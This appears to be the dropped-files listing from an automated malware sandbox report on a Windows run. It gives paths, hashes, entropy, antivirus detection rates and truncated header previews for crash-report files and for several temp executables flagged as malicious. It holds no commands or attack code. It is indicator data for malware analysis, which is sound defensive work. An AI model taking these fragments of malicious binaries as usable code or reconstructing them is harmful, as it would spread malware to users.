                                                                                                                                                                                                    Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE37D.tmp.dmp
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 12:59:13 2022, 0x1205a4 type
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):42152
                                                                                                                                                                                                    Entropy (8bit):2.0066430183292843
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:HFRvcFZtdYOeh0kSj12U5sdyWpa1MiKZOtE6VP:q/dfeOxEMu65
                                                                                                                                                                                                    MD5:F628B274C6B60164101448954C45EFF3
                                                                                                                                                                                                    SHA1:CD463E4DE0634EA4431E69A4D900606C8DA2CBC0
                                                                                                                                                                                                    SHA-256:3A6BADC9B83322213065A57A930945ED71C5E95E4C37A39C0845BF98849E152E
                                                                                                                                                                                                    SHA-512:54957A5CB1C71085856DF3FB836EDED530D7A06818B7A6CF15340E6D54FA363FBB10DC27085BFD03FB1DF9B6FE9FDC31CC3F8F9ADD3FA01145DF5FB1D4B64B35
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MDMP....... ........s.a....................................4...v(..........T.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T............s.a............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAB2.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8392
                                                                                                                                                                                                    Entropy (8bit):3.699690043327041
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNic5I6P6YFZSU4rPGgmfgRShCpD189b26sfkym:RrlsNiQI6P6Y7SU4ygmfgRST2Zfg
                                                                                                                                                                                                    MD5:A9753AEAD451110AC4CAAA29B755DDB3
                                                                                                                                                                                                    SHA1:4BFA1A12F66A6658FB459B7EE3204AFA0286E12F
                                                                                                                                                                                                    SHA-256:D09C071D33C4F3E5C4737A8D1ACE78F4ACFB66F72FFBEADDA46541E758FE0795
                                                                                                                                                                                                    SHA-512:32868AF61B1FFB881B6CAEF762B990A6AE60038F547D615C8FBD3119DCD6150271CE1464963D53353B7AF197333FADA895B820DEDD88C6648C0DF97F9DDF00C7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.0.<./.P.i.d.>.......
                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF66.tmp.xml
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4685
                                                                                                                                                                                                    Entropy (8bit):4.473487564710429
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:cvIwSD8zsRJgtWI995WSC8Bt8fm8M4Jx8qFr+q8vz8x+Jqp0kd:uITfjSISN0JlKE+op0kd
                                                                                                                                                                                                    MD5:6FA942E7A0B9387540319A8CC997EA42
                                                                                                                                                                                                    SHA1:1137F86C001DF8534D536609F9F5AF8E0C3E13B6
                                                                                                                                                                                                    SHA-256:F47EC35D9DD3C8DFF28D7B337F265CE8F91884E86AF3D03B4078EFE1F72E212C
                                                                                                                                                                                                    SHA-512:92911D973CE064C011DD99361C4D65CA10155E2630C4E514A237CF89E0858A1DDC78A8BBE715E78C0C3405A18827E239B799BE15383B3584305902AAAAA0223C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341969" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7D0A.exe.log
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\7D0A.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):700
                                                                                                                                                                                                    Entropy (8bit):5.346524082657112
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                                    MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                                    SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                                    SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                                    SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.11008162512076788
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:26+k1jXm/Ey6q9995qGq3qQ10nMCldimE8eawHjc1F1f:26b4l68MjLyMCldzE9BHjcfd
                                                                                                                                                                                                    MD5:EBCE4E8FF3E15A399552D4690AC37736
                                                                                                                                                                                                    SHA1:79211AAAE61CE12A7C8E53974D5EF0231D3FBF57
                                                                                                                                                                                                    SHA-256:26C30570B0A71B1B711F1618D8F0530F7BD3F6C8C24239C83A499EFA64C65529
                                                                                                                                                                                                    SHA-512:53DB29D3009663FAF11E223BB73E6DD4CD549C7EFD29834F77EF495BE4BC9A3FC3F976D0B5EF86EC306FB3B8E867C575DBD853D33BF6C6149E70921D35D4B796
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ................................................................................T...X....T3@.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... ......._jF...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.T...X...M\3@....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.1125318481978825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:L0jXm/Ey6q9995qQ1miM3qQ10nMCldimE8eawHza1miI80P:tl68MQ1tMLyMCldzE9BHza1tI8k
                                                                                                                                                                                                    MD5:9C90F06CC6ACB3A8B7C71F4B9E3EC5A3
                                                                                                                                                                                                    SHA1:805FAA6F88EBD4C2CF661944EE2B62A41AAF2FBB
                                                                                                                                                                                                    SHA-256:3A5F2158913B717BADB36A34B9084E5FF33C8E7D9727ED520A3C24EF69C3DC1A
                                                                                                                                                                                                    SHA-512:4147E871711095822EA66BDCFB5BAA56DAC86493614B40A1A7299C3F175EE669D8648741A2D73F9A14FF920353B627AADFB1285D1D20922061BD49B0EF9D0558
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ................................................................................T...X....T2@.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... ......._jF...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.T...X...I\2@....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.11262246064646632
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:ttsjXm/Ey6q9995qGu1mK2P3qQ10nMCldimE8eawHza1mKstP:xl68MGu1iPLyMCldzE9BHza14F
                                                                                                                                                                                                    MD5:68886B0A5811A0A2CD8E4FE4F8F7B79B
                                                                                                                                                                                                    SHA1:AD7CA336D3562569DC0A4BEF29726F31DDC4285D
                                                                                                                                                                                                    SHA-256:810E1C295F835F33BCD2A363AA3EA3D1262324C9881D8EF01A9C8DAEE8119558
                                                                                                                                                                                                    SHA-512:51E02165BFCAC995F975258532F924462B9B13CBC0A57E0E736A6B59729C936855885461593DF5A9364BCEEA51A5B2504177EED9F668740442A87BAA939D1522
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ................................................................................T...X...3.1@.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... .......XjF...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.T...X....1@....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1547.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3576320
                                                                                                                                                                                                    Entropy (8bit):7.9976863291960605
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                                                                                                                    MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                                                                                                                    SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                                                                                                                    SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                                                                                                                    SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1FD7.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):905216
                                                                                                                                                                                                    Entropy (8bit):7.399713113456654
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                                    MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                    SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                                    SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                                    SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\27D7.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:MS-DOS executable
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):557664
                                                                                                                                                                                                    Entropy (8bit):7.687250283474463
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                                                                                                    MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                                                                                                    SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                                                                                                    SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                                                                                                    SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\3A08.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3590568
                                                                                                                                                                                                    Entropy (8bit):7.998676115843541
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:49152:EL+mxBl/yyJfM7/v97b/WOpE93+VBgpPhaOJxZJp43eDEC9qMF3yJYztuHNaWq5Y:ESyLJg5VE93kc5nZJcTAqO7Jut8y
                                                                                                                                                                                                    MD5:980CC192801D493B45B4ABFC6EEE9AD7
                                                                                                                                                                                                    SHA1:FB0924030CDE9BEFB4D2C39BD71F14AC252E80B1
                                                                                                                                                                                                    SHA-256:22CB98A4832824ADC290E8A9541B50228F4F75FB1A8E621FD80D4D2BE7ED73F9
                                                                                                                                                                                                    SHA-512:F66D5B6EA4C1E5961C01528D79E04AE047A869EB9968FF8F173A1FEC34DA91883A839CB52D415A32BF3080AA1232B022DC9C077719F14F60930BFDB7081F6137
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a.............................0............@..........................0W......48.....................................||R. .....P...............6..#..................................................................................................C...........................@................0...z..................@....................r...~..............@............ ..........................@............)..........................@.............2......./.................@....rsrc.........P..:....0.............@....Pl7qR7h.....pR.......1.............@....adata....... W.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\6CF.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3576320
                                                                                                                                                                                                    Entropy (8bit):7.9976863291960605
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                                                                                                                    MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                                                                                                                    SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                                                                                                                    SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                                                                                                                    SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\743F.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):320000
                                                                                                                                                                                                    Entropy (8bit):6.684181622705276
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:PgjJDJ13d07SuLbkayXpkU9xb1V2PyiORsBe:Pgj/13d4lkXWsxRV25OR
                                                                                                                                                                                                    MD5:F05279062D67B1F816420725086C77AB
                                                                                                                                                                                                    SHA1:4932E057633CB1C26D4086DAEC0B46E9F8D53C92
                                                                                                                                                                                                    SHA-256:8C0272F6D0136BB8ADEB659D8DE19A4BE68A81FC018587275E045103FC01B49D
                                                                                                                                                                                                    SHA-512:040875AE4CB8F5D0F6DE40393C35F567131263C23C963352BB7E483E93C56C847B94C8388ABDC341704635344019D66736A9BA0F25A3D1D54D964E42434DB623
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z<...R...R...R..I...R..I.g.R...)...R...S.>.R..I...R..I...R..I...R.Rich..R.........PE..L....n._............................ .............@.................................T.......................................T...(...................................................................0...@...............@............................text............................... ..`.data...............................@....lemel..............................@....lobil..............................@....cixu...............................@....rsrc...............................@..@.reloc...F.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7D0A.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):537088
                                                                                                                                                                                                    Entropy (8bit):5.840438491186833
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                                                                                                    MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                    SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                                                                                                    SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                                                                                                    SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 89%
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\B50.exe
                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):323584
                                                                                                                                                                                                    Entropy (8bit):6.705624152574406
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:gSsmY+jbtJGpwWuIzaVxZOJ4vuyl2ZCA70FAStpV:gSsmY+ft0pw0zoMiv3l2F7I
                                                                                                                                                                                                    MD5:FF0D190D6DF636D7DE53B8B6B683BC6E
                                                                                                                                                                                                    SHA1:3C9768818A5C467062F9E34DCFA8FAEFE3B507C6
                                                                                                                                                                                                    SHA-256:012CE05F8263D161D4387749446CB3DF3240FD33CF71DFB3F48DC4F4C9354298
